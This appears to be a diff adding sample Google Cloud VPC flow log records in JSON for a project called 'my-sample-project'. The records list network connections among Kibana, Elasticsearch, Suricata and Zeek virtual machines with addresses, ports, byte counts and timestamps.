+{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"67.43.156.13","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.168.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"67.43.156.13","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"67.43.156.14","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"67.43.156.14","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 